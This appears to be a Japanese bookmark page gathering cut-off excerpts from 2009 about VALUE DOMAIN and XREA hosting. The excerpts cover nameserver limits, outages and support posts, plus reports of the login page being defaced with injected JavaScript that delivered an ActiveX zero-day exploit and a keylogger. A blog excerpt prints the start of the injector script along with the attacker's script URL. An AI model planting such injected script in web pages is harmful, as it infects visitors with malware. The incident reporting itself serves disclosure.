外部管理&外部利用における無料ネームサーバーの機能制限について | お知らせ - バリュードメイン
お客様 各位 平素はバリュードメインをご利用いただき誠にありがとうございます。 下記内容で、ネームサーバーの一部制限を行います。 ○制限開始日時 2009年9月1日 ○対象となるドメイン ・弊社以外で取得、管理されているドメインで かつ ・弊社以外のサーバーに向ける設定をしているドメイン →弊社のサービス、サーバーを利用していないドメイン ○内容 ネームサーバー機能の制限・応答停止 他社管理ドメインの他社での利用についても利用を開放し、制限を行ってきませんでしたが、残念ながら、一部悪用が見られる点、名前解決リクエストが増大している点を考慮し、制限させていただくことになりました。お手数ですが、他社サービス付属のネームサーバー機能や、第三者のネームサーバーで代替いただければと存じます。 なお、他社からの移転の際に、前もって弊社のネームサーバーをご利用いただく場合がありますので、DNS設定から3
ネーサーバーの混雑について - お知らせ(20090721-2) - VALUE DOMAIN:バリュードメイン
お客様 各位 平素はバリュードメインをご利用いただき誠にありがとうございます。 下記内容で、ネームサーバーの混雑が発生しております。 ○症状 6月頃より、当サービスの無料ネームサーバー ns1-3.value-domain.com の 一部に対して無効な大量のパケット・トラフィックがあることを確認しています。 上記症状が発生した際、名前の解決に時間が掛かるといった影響を受ける場合がございます。 異常を検知しましたら、フィルタリング等で随時対策を行っており、また、近日中に 根本的な対策を講じる予定です。 お客様におかれましては、DNS設定を頻繁に更新しない場合は、標準で120秒の TTL(更新間隔)を、3600〜14400秒等に上げていただく事でかなりの確率で回避できます。 ぜひご検討いただければ幸いです。 ご利用の皆様には、ご迷惑、ご心配をおかけし、大変申し訳ございません。 何卒、対策完了
XREA - ログインページにおける不正表示について 2009/07/21
お客様 各位 平素はバリュードメインをご利用いただき誠にありがとうございます。 下記内容で、ログインページにおきまして不正表示がございました。 ○症状 7月6日、ログインページにて、ウィルスダウンロードを誘導するページへのリ ンクが設置されていました。ウィルスについては下記が参考になります。 Microsoft Video ActiveX コントロール の脆弱性(MS09-032)について http://www.ipa.go.jp/security/ciadr/vul/20090707-ms-activex.html ○事実・経緯 7月6日朝に、新しい機能に対応するため本番用ウェブサーバーのメンテナンス 作業を行いました。その際の流れは、下記の通りとなります。 通常、メンテナンス時は、普段は停止中である代替用ウェブサーバー(202.222. 31.78)をアクセス可能にし、本番用ウェブサー
サーバステータス一覧
■表記・注意事項 OK ・・・ サーバーが正常に稼動しています。 NG ・・・ サーバーが正常に稼動していません。 ※一時的な混雑や、監視サーバー側やその間の通信の問題で一時的にNGとなる場合があります。 緑色のバー ・・・ 快適にご利用いただけます。 オレンジ色のバー ・・・ やや混雑しています。 赤色のバー ・・・ 混雑しています。
デジロウイルスまとめwiki
07/06 VALUE DOMAINのログイン画面に不正なJSが挿入される改竄が発見される(第1報・改竄を確認) ログイン画面 (A) ttp://www.value-domain〆.com/login.php は (B) ttp://1856317799〆:888/s.js を呼び出している (C) ttp://110.165.41.103〆:888/dir/m.htm を呼び出している (D) ttp://110.135.41.103〆/dir/show.php を呼び出している ↓ 07/06 魚拓が取得される ttp://s03.megalodon.jp/2009-0706-1843-51/https://〆www.value-domain.com/login.php ↓ 07/06 (C)にノーガードのXPでアクセスしたところキーロガーが検出・ダウンロードされた ↓ 07/07
IEをターゲットにしたゼロデイ攻撃が発生中 | スラド Submission
pluto 曰く、 各所(下部の※参照)によると、Microsoft Video ActiveX コントロールの脆弱性により、リモートでコードが実行される (972890)脆弱性を利用したゼロデイ攻撃が発生しているようだ。 なおこれは5月末に出た Microsoft DirectShow の脆弱性により、リモートでコードが実行される (971778)脆弱性とは別であることに注意。 クライアント側の対策としては IE を使用しない、もしくは Fix it による回避策の実行を行うなどがあげられる。 国内では VALUE DOMAIN のログイン ページ改ざん(2ch.net)が確認された。また VALUE DOMAIN を使用している wikiwik.jp 内でもサイトの改ざんがあり、各 wiki を閲覧したユーザーに被害が広がった模様。 wikiwiki.jp、VALUE DOMAIN と
VALUE DOMAINにウイルスコードが仕込まれる! | 無題ブログ
VALUE DOMAINにウイルスコードが仕込まれる! VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。 ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。(まだ修正されてないのでリンクは切ってます) ttps://www.value-domain.com/login.php 上記にアクセスをしたらjavascriptが読み込まれるようです。 PLAIN TEXTJavaScript: <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "http://1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js
セキュリティ強化について | お知らせ - バリュードメイン
お客様 各位 平素はバリュードメインをご利用いただき誠にありがとうございます。 クレジットカード決済時のセキュリティ強化のため、各クレジットカードの認証サービス:3Dセキュア(VISA/MASTER)、および、Jセキュア(JCB)を導入いたします。 日時、注意事項などは下記の通りとなります。 ○日時 2009年7月中旬 (切り替え日時が決まり次第、追ってアナウンスさせていただきます。) ○注意事項 ・お持ちのクレジットカードで、本人認証サービスを有効にされている場合は 決済時に、パスワードを入れる画面が出るようになります。 パスワードを入れる画面が出る以外は、いままで通りとなります。 ・お持ちのクレジットカードで、本人認証サービスが有効になっていない場合は いままで通りとなります。 ◎お持ちのクレジットカードで、 本人認証サービスを有効にされている場合で、パスワードをお忘れになった場合は、
YSlowを使ってWordPressの表示速度の改善をやりました « Cherry & Lotus™
ブログを書いていて最近思うのは、表示速度の遅さ。XREAのWebサーバとデータベースサーバに問題があると思って、こればかりはどうしようもないと思っていたのですが、以下の記事を見てまだまだやれる事があると実感しました。 YSlowでWebページを高速化 – リッチさと速さを同時に実現するUIを! YSlowとは、Yahoo! Developer Networkが提供するWebページパフォーマンス計測ツール。FirefoxにAdd-onとして実装する事が出来る。YSlowを使うには、Firebugをインストールする必要がある。 使い方は簡単だ。[ツール] – [Firebug] – [Firebugを新しいウィンドウで開く]を選択し、Firebugを開く。 YSlowをインストールすると、通常のFirebugの画面にYSlowという項目が追加される。この項目を選択すると、上の段に、Perfor
XREAのサーバ障害 - おじさんの備忘録-番外編-
昨年あたりからXREAの障害に対する対応が非常に遅くユーザからのクレームが増殖している。 内部の体制が変わったのかフォーラムを参照する限りでは、障害に対する迅速な対応はされていないように思えてならない。あのような低価格で運営を続けること自体限界に達しているのかな?と邪推している。 現在XREA+を2個契約しているがそのうち1つが何度か障害に遭遇したため200日間も期間延長されていた。 私の場合サイトを2つばかり運営しているが営利目的なサイトでもなく又、商用ベースでのサイトでもないので悲しいかな数日間障害で見れなくなってしまったとしても何ら問題はない。 個人的には提供されているサービス内容自体は素晴らしいものだと思っているので、今後もサービスの質を落とすことなく続いて欲しいと願っている。 09.03.23 追記 お願いしたばかりなのに早速落ちている・・・。
XREA&CORE SUPPORT BOARD - View Single Post - [統一スレッド] 全・複数サーバー障害連絡・メンテナンス情報
下記内容で障害がございました。 ○対象サーバーと時間: 2009年1月30日(金)深夜 ~ 2月9日(月) 15:00 s231-244 s261-273 s321-336 の全サーバー s53-s60,s91-93,s151-155,s171-s200,s211-s220,s246-s260,s276-s290 の一部のサーバー におけるFTP,メール接続処理 ○原因・内容: 複数台あるキャッシュネームサーバーの中の一部で、その上位に設定したネームサーバーとの間で 問題が発生し、名前の解決ができなくなり、処理が渋滞する状況が発生しました。 9日の時点で問題が解決し、通常に戻っております。 ○今後 前回障害時に対象となっており反映が遅れておりましたサーバーと、今回対象となりましたサーバーで XREA+(Plus)サービスをご利
XREA&CORE SUPPORT BOARD - View Single Post - [統一スレッド] 全・複数サーバー障害連絡・メンテナンス情報
XREAのwebmasterからいまだに報告がないため、1利用者ですが状況と救済策ををまとめましたので、どうぞご利用ください。 現在の状況と逃げ手 下記内容でネームサーバーに関係する大規模な接続遅延障害が起こっています。 1.対象サーバーと時間  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 59サーバー(現在判明分) s68,s70,s80,s98, s143,s167,s184,s198, s217,s218,s231,s232,s233,s234,s235,s236,s237,s238,s239,s240,s241, s242,s243,s244,s248,s261,s262,s263,s264,s265,s266,s267,s268,s269, s270,s271,s272,s273,s283,s297, s307,s318,s321,s322,s323,s324,s325
ReadMe: 「接続できません」を投稿する前に。 - XREA&CORE SUPPORT BOARD
最近「接続できません」という投稿が目立ってきたので、 投稿する前に最低限のチェックを行いましょう。 1.初級編 ・管理画面のホスト登録を忘れている。 ・ファイアーウォールソフトを導入している。 (Zone-Alarm , Norton Internet Security etc.) ・プロバイダが、「自宅サーバー禁止」などの理由で、 「パケットフィルタリング」を行っている。 以上の場合、PASVモードにすることで解決できます。 2.中級編 ・プロキシを通している。 以下の方法で、判断できます。 (i)Windows 95/98 の場合、ファイル名を指定して実行→"winipcfg"→と入力→IPの欄を見る。 (ii)Windows2000 の場合、コマンドプロンプトから、"ipconfig"と入力→IPが出てくる。 出てきたIPと、管
月の詩 » XREAサーバーでサイト改竄攻撃
またXREAです。 今回は広告ではなく、XREAサーバー上の複数のサイトで、 htmlソースを改変した強制アクセススクリプトが仕込まれていたようです。 同時にpass漏れとも思えませんので、サーバールート上に仕込まれた可能性がありそうですね。 スクリプトのアクセス先は、6月の広告ウィルスの時と同じ罠置き場です。 XREAサーバー利用者の方は、不審な改変が行われていないかチェックしてみてください。 MMOBBS : アカウントハック対策・セキュリティ 総合スレ 667 名前:(○口○*)さん[sage] 投稿日:08/08/09 13:06 ID:0MNaemeK0 まーたXREAがやばいらしい。複数サイトで確認。 犯人は6月の広告改ざんと同一(サーバは同じでポートだけと違う(81→88))。 793 :名も無き軍師:08/08/07 22:04:32 さきほど気付いたの
XREA&CORE SUPPORT BOARD - View Single Post - トラックバックスパム、コメントスパムの自動拒否について
トラックバックスパム、コメントスパム等の海外からの書き込みで非常に負荷が掛かっている場合は、 個々サイト内におきまして、海外からの「POST」リクエストを.htaccessにて制限させていただくことがございます。 ご理解いただければと存じます。 設置させていただく.htaccessの例を下記URLに設置いたしました。IPのリストは定期的に更新します。 http://www.xrea.com/files/htaccess_allowjpaddr.txt mt-****ファイルへの「POST」リクエストを日本のIPアドレスからの場合だけ許可する設定になっています。 かなり強引な手法ですが、海外のプロキシサーバーからの大量のスパムはほぼ拒否できます。 ただし、海外の問題ないユーザー様からのコメント・トラックバックも拒否します。 制限は「POST」のみですので、検索
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
セキュリティ | So-net (ソネット)
Video ActiveXコントロールのゼロデイ脆弱性に対応する 
[s11サーバ]FTP接続後すぐに切断されてしまいます。 - XREA&CORE SUPPORT BOARD
http://sb.xrea.com/showthread.php?p=83962
XREA広告改竄(ウィルス情報)のまとめサイト